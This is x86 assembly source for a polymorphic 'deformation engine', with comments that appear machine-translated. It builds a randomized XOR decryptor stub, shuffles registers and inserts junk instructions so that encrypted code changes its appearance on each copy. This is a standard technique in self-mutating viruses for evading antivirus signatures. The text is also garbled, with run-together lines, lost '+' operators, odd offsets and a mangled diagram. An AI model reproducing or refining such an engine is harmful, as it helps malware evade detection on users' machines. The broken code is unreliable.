.586p.model flat, stdcall
Public _metramorphosize
.code
STARTOFEVOLUTIONENGINE = $
Deformation engine principle:; Deformation code consists of 2 parts: 1) A module that is decoded by the engine randomly generated by the engine randomly generated by the engine; the standard decoding module as follows:; _____________________________________________________________________; | |; | pushad |; | call @ 0 |; | @ 0: |; | pop Index_reg |; | add Index_reg, offset EncryptedData |; | mov Count_reg, count |; | mov Key_reg, Key |; @ 1: |; | xor [index_reg], key_reg |; | | | | | | | JNZ @ 1 | | | POPAD |; | ________________________________________________________________________________________________________________________________________________________just randomly selected 3 as an Index register, KEY register, and Counter register, respectively. And in; the decryption module is randomly inserted into 1 ~ 3 garbage code.
EAX_REG = 0ecx_reg = 1edx_reg = 2ebx_reg = 3ESP_REG = 4EBP_REG = 5ESi_REG = 6edi_reg = 7
; 0 ---- EAX; 1 ---- ECX; 2 ---- EDX; 3 ---- EBX; 4 ---- ESP; 5 ---- EBP; 6 ---- ESI; 7 ---- EDI
INDEX_REG = 0key_reg = 1count_reg = 2Free_Reg1 = 3Free_reg2 = 4Free_REG3 = 5Free_Reg4 = 6
***********************************; * *; * return a random number betWeen *; * 0 ~ (x-1) *; * *; ********************************* Random: RDTSC PUSH EAX DB 0FH, 031H XOR EDX, EDX DIV DWORD PTR [ESP 8] POP Eax Ret 4routine1:
MOV BYTE PTR [EDI], 0B8H MOV DL, BYTE PTR [EBX ECX] Add [EDI], DL INC EDI RET
; **********************; * *; * generate garbaby statement *; * *; **** ************************** GENERATEGARBABYCODE:
Push EAX
Push 3; LP_generategarbabycode: Push 4; Push 3; CMP EDX, 2 JZ LB_ $ A001 CMP EDX, 1 JZ LB_ $ A002 MOV BYTE PTR [EDI], 48H; LB_ $ A001: MOV BYTE PTR [EDI], 0B8H; LB_ $ A002: MOV Word PTR [EDI], 0C083H; LB_ $ A003: Add Eax, Free_REG1 MOV DL, [EBX EAX] Add [EDI], DL POP Eax Add Edi, EAX LOOP LP_GENERATEGARBABYCODE POP EAX RET *********************************************************** ********************; *; * parameters:; * [param1]; * size; * [param2]; * key; *; ***** *********************************************************** ************** Regtable = $ @ a = $ db 0, 1, 2, 3, 5, 6, 7; GeneratedECodeModule: GeneratedDecodeModule PROC Call @ 0 @ 0: pop EBX Lea EBX, [EBX] [@ A- @ 0] *********************************************************** ******************; * *; * Randomly Array the elements of the register table, the selection *; * the first three ones to use as the index register, the KEY *; * register and the counter ration register *; * *; ***************************************************** ******************************** LB_RAndomizegegisterTableAgain: Mov ECX, 19796LP_RandomizeRegtable: Push 7 Call Random Xchg Edx, ESI PUSH 7 CALL Random MOV Al, [EBX EDX] Xchg Al, [EBX ESI] XCHG AL, [EBX EDX] loop lp_randomizegegtable *********************************************************** *****************; * Don't use the ebp register as the index register, because an *; * statement of 'xor [ebp], reg2' IS 3 -byte-length *; * registers, a statement of 'xor [reg1], reg2' is 2-byte-length *; ***************** *********************************************************** CMP BYTE PTR [EBX] [Index_reg], EBP_REG JZ LB_RANDOMIZEREGISTERTABLEAGAIN ; Push EDI LEA ESI, [EBX] [Generategarbabycode- @ a] MOV [EDI], BYTE PTR 60h Inc EDI CALL ESI; Generate Garbaby Code MOV [EDI], BYTE PTR 0E8H INC EDI PUSH 13 Call Random Add Edx, 6 MOV [EDI], EDX Add Edi, 4 Push EDI LEA EDI, [EDI EDX] MOV BYTE PTR [EDI], 58H MOV Al, [ EBX] [INDEX_REG] Add [EDI], Al INC EDI CALL ESI; Generate Garbaby Code MOV Word PTR [EDI], 0C083H Inc EDI Add [EDI], Al Inc Edi Push EDI Inc EDI CALL ESI; Generate Garbaby Code Push Key_REG POP ECX CALL ROUTINE1; MOV [EDI], DWORD PTR TOTAL_DWORDS MOV EDX, [ESP 100008H] [00000008H] MOV [EDI], EDX Add Edi, 4 Call ESI Push Count_reg Pop Ecx Call Routine1; Mov [EDI], DWORD PTR Encrypt_Key Mov Edx, [ESP 00000004H] [00000008H] MOV [EDI], EDX Add Edi, 4 Call ESI Push EDI MOV Word PTR [EDI], 0031H Movzx EDX, BYTE PTR [EBX] [Key_REG] SHL EDX, 3 Add DL, [EBX] [Index_Reg] Inc EDI Add [EDI], DL Inc EDI CALL ESI MOV DWORD PTR [EDI], 4804C083H Inc EDI Add [EDI], Al INC EDI INC EDI MOV DL, [EBX] [count_reg] add [eDI], DL INC EDI Mov DWORD PTR [EDI], 00610075H Lea ECX, [EDI 1] POP EAX SUB EAX, EDI DEC EAX DEC EAX MOV [ECX], Al Inc Edi Inc EDI Inc EDI POP EAX POP EDX MOV ECX, EDI SUB ECX, EDX MOV [EAX], CL Ret 8 GeneratedDecodeModule Endp SIZE_OF_ENGINE = $ -StartofevolutionEngine _Metramorphosize proc *********************************************************** *************************; * *; * parameters: *; * esi: the start address of the code to be encrypted *; * ECX : The number of bytes of the code *; * edi: the start address of the buffer to store the encrypted code *; *; ********************** *********************************************************** *** DB 0FH, 031HPUSH ESI Push EAX PUSH ECX PUSH EDI Push Eax Push ECX CALL GeneratedDecodeModule POP EDX POP ECX POP EAX POP ESI Sub EDX, EDI PUSH EDX LP_ENCRYPTDATA: MOV EDX, [ESI] xor Edx, EAX MOV [EDI], EDX ADD ESI, 4 Add Edi, 4 LOOP LP_ENCRYPTDATA POP EAX RET _Metramorphosize endp End
